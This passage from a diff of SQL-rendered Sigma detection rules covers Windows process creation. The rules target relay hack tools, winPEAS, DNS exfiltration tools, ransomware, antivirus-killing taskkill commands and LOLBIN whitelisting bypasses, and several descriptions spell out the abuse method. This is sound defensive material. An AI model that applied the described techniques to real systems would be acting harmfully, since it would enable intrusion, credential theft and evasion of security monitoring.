+ "Legitimate use for tracing purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR OriginalFileName = 'psexec.c'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR OriginalFileName = 'mftrace.exe') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) OR ParentImage LIKE '%\\\\mftrace.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexec_execution.yml" + "filename": "proc_creation_win_lolbin_mftrace.yml" }, { - "title": "Potential Discovery Activity Via Dnscmd.EXE", - "id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", - "status": "experimental", - "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.", - "author": "@gott_cyber", + "title": "LockerGoga Ransomware Activity", + "id": "74db3488-fd28-480a-95aa-b7af626de068", + "status": "stable", + "description": "Detects LockerGoga ransomware activity via specific command line.", + "author": "Vasiliy Burov, oscd.community", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1543.003" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Legitimate administration use" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%/enumrecords%' ESCAPE '\\' OR CommandLine LIKE '%/enumzones%' ESCAPE '\\' OR CommandLine LIKE '%/ZonePrint%' ESCAPE '\\' OR CommandLine LIKE '%/info%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE 
'\\')" ], - "filename": "proc_creation_win_dnscmd_discovery.yml" + "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" }, { - "title": "Wab/Wabmig Unusual Parent Or Child Processes", - "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "title": "Kavremover Dropped Binary LOLBIN Usage", + "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", "status": "experimental", - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], "falsepositives": [ "Unknown" ], "level": "high", + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wab_unusual_parents.yml" + "filename": "proc_creation_win_lolbin_kavremover.yml" }, { - "title": "Gpresult Display Group Policy Information", - "id": "e56d3073-83ff-4021-90fe-c658e0709e72", + "title": "Add New Windows Capability - ProcCreation", + 
"id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", "status": "experimental", - "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", - "author": "frack113", + "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1615" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the capabilities by administartors or users. Filter accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\gpresult.exe' ESCAPE '\\' AND (CommandLine LIKE '%/z%' ESCAPE '\\' OR CommandLine LIKE '%/v%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-WindowsCapability%' ESCAPE '\\' AND CommandLine LIKE '%OpenSSH.%' ESCAPE '\\')" ], - "filename": "proc_creation_win_gpresult_execution.yml" + "filename": "proc_creation_win_powershell_add_windows_capability.yml" }, { - "title": "Remote Access Tool - NetSupport Execution From Unusual Location", - "id": "37e8d358-6408-4853-82f4-98333fca7014", + "title": "Use of FSharp Interpreters", + "id": "b96b2031-7c17-4473-afe7-a30ce714db29", "status": "experimental", - "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", + "author": 
"Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use by a software developer." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\client32.exe' ESCAPE '\\' OR Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=a9d50692e95b79723f3e76fcf70d023e%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsianycpu.exe' ESCAPE '\\' OR OriginalFileName = 'fsianycpu.exe' OR Image LIKE '%\\\\fsi.exe' ESCAPE '\\' OR OriginalFileName = 'fsi.exe'))" ], - "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" + "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml" }, { - "title": "Disable Windows IIS HTTP Logging", - "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "title": "Taskkill Symantec Endpoint Protection", + "id": "4a6713f6-3331-11ed-a261-0242ac120002", "status": "experimental", - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "author": "frack113", + "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "author": "Ilya Krestinichev, Florian Roth (Nextron 
Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_appcmd_http_logging.yml" + "filename": "proc_creation_win_taskkill_sep.yml" }, { - "title": "Potential LethalHTA Technique Execution", - "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", - "status": "test", - "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", - "author": "Markus Neis", + "title": "Using AppVLP To Circumvent ASR File Path Rule", + "id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "status": "experimental", + "description": "Application Virtualization Utility is included with Microsoft Office. 
We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", + "author": "Sreeman", "tags": [ + "attack.t1218", "attack.defense_evasion", - "attack.t1218.005" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\appvlp.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\msoasb.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_lethalhta_technique.yml" + "filename": "proc_creation_win_lolbin_appvlp.yml" }, { - "title": "Suspicious Schtasks Schedule Types", - "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", + "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", "status": "experimental", - "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1047" ], "falsepositives": [ - "Legitimate processes that run at logon. 
Filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_schedule_type.yml" + "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" }, { - "title": "DNS Exfiltration and Tunneling Tools Execution", - "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "title": "Potential SMB Relay Attack Tool Execution", + "id": "5589ab4f-a767-433c-961d-c91f3f704db1", "status": "test", - "description": "Well-known DNS Exfiltration tools execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ - "Unlikely" + "Legitimate files with these rare hacktool names" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iodine.exe' ESCAPE '\\' 
OR Image LIKE '%\\\\dnscat2%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%PetitPotam%' ESCAPE '\\' OR Image LIKE '%RottenPotato%' ESCAPE '\\' OR Image LIKE '%HotPotato%' ESCAPE '\\' OR Image LIKE '%JuicyPotato%' ESCAPE '\\' OR Image LIKE '%\\\\just\\_dce\\_%' ESCAPE '\\' OR Image LIKE '%Juicy Potato%' ESCAPE '\\' OR Image LIKE '%\\\\temp\\\\rot.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Potato.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SpoolSample.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Responder.exe%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\LocalPotato%' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '% smbrelay%' ESCAPE '\\' OR CommandLine LIKE '% ntlmrelay%' ESCAPE '\\' OR CommandLine LIKE '%cme smb %' ESCAPE '\\' OR CommandLine LIKE '% /ntlm:NTLMhash %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PetitPotam%' ESCAPE '\\' OR CommandLine LIKE '%.exe -t % -p %' ESCAPE '\\') OR (CommandLine LIKE '%.exe -c \"{%' ESCAPE '\\' AND CommandLine LIKE '%}\" -z' ESCAPE '\\')) AND NOT (((Image LIKE '%HotPotatoes6%' ESCAPE '\\' OR Image LIKE '%HotPotatoes7%' ESCAPE '\\' OR Image LIKE '%HotPotatoes %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" + "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" }, { - "title": "New Generic Credentials Added Via Cmdkey.EXE", - "id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", + "title": "HackTool - winPEAS Execution", + "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", "status": "experimental", - "description": "Detects usage of cmdkey to add generic credentials. 
As an example, this has to be used before connecting to an RDP session via command line interface.", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", + "author": "Georg Lauenstein (sure[secure])", "tags": [ - "attack.credential_access", - "attack.t1003.005" + "attack.privilege_escalation", + "attack.t1082", + "attack.t1087", + "attack.t1046" ], "falsepositives": [ - "Legitimate usage for administration purposes" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /g%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'winPEAS.exe' OR (Image LIKE '%\\\\winPEASany.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASany\\_ofs.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx64.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx64\\_ofs.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx86.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx86\\_ofs.exe' ESCAPE '\\') OR (CommandLine LIKE '% applicationsinfo%' ESCAPE '\\' OR CommandLine LIKE '% browserinfo%' ESCAPE '\\' OR CommandLine LIKE '% eventsinfo%' ESCAPE '\\' OR CommandLine LIKE '% fileanalysis%' ESCAPE '\\' OR CommandLine LIKE '% filesinfo%' ESCAPE '\\' OR CommandLine LIKE '% processinfo%' ESCAPE '\\' OR CommandLine LIKE '% servicesinfo%' ESCAPE '\\' OR CommandLine LIKE '% windowscreds%' ESCAPE '\\') OR CommandLine LIKE '%https://github.com/carlospolop/PEASS-ng/releases/latest/download/%' ESCAPE '\\' OR ParentCommandLine LIKE '% -linpeas' ESCAPE '\\' OR CommandLine LIKE '% -linpeas' 
ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml" + "filename": "proc_creation_win_hktl_winpeas.yml" }, { - "title": "File With Suspicious Extension Downloaded Via Bitsadmin", - "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "stable", + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine 
LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" + "filename": "proc_creation_win_exploit_cve_2019_1388.yml" }, { - "title": "Suspicious Process Start Locations", - "id": "15b75071-74cc-47e0-b4c6-b43744a62a2b", - "status": "test", - "description": "Detects suspicious process run from unusual locations", - "author": "juju4, Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - KrbRelay Execution", + "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "status": "experimental", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "car.2013-05-002" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\') OR (Image 
LIKE 'C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_run_locations.yml" + "filename": "proc_creation_win_hktl_krbrelay.yml" }, { - "title": "Remote File Download via Desktopimgdownldr Utility", - "id": "214641c2-c579-4ecb-8427-0cf19df6842e", + "title": "Suspicious Binary In User Directory Spawned From Office Application", + "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "status": "experimental", - "description": "Detects the desktopimgdownldr utility being used to download a remote file. 
An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", - "author": "Tim Rauch", + "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", + "author": "Jason Lynch", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND CommandLine LIKE '%/lockscreenurl:http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND Image LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml" + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" }, { - "title": "Logon Scripts (UserInitMprLogonScript)", - "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "title": "Fireball Archer Install", + "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", "status": "test", - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "description": "Detects Archer malware invocation via rundll32", + 
"author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", - "attack.persistence" + "attack.execution", + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\proquota.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%InstallArcherSvc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" + "filename": "proc_creation_win_malware_fireball.yml" }, { - "title": "VMToolsd Suspicious Child Process", - "id": "5687f942-867b-4578-ade7-1e341c46e99a", + "title": "Use of OpenConsole", + "id": "814c95cc-8192-4378-a70a-f1aafd877af1", "status": "experimental", - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "author": "behops, Bhabesh Raj", + "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.persistence", "attack.t1059" ], "falsepositives": [ - "Legitimate use by administrator" + "Legitimate use by an administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'OpenConsole.exe' OR Image LIKE '%\\\\OpenConsole.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsTerminal%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_openconsole.yml" }, { - "title": "Wusa Extracting 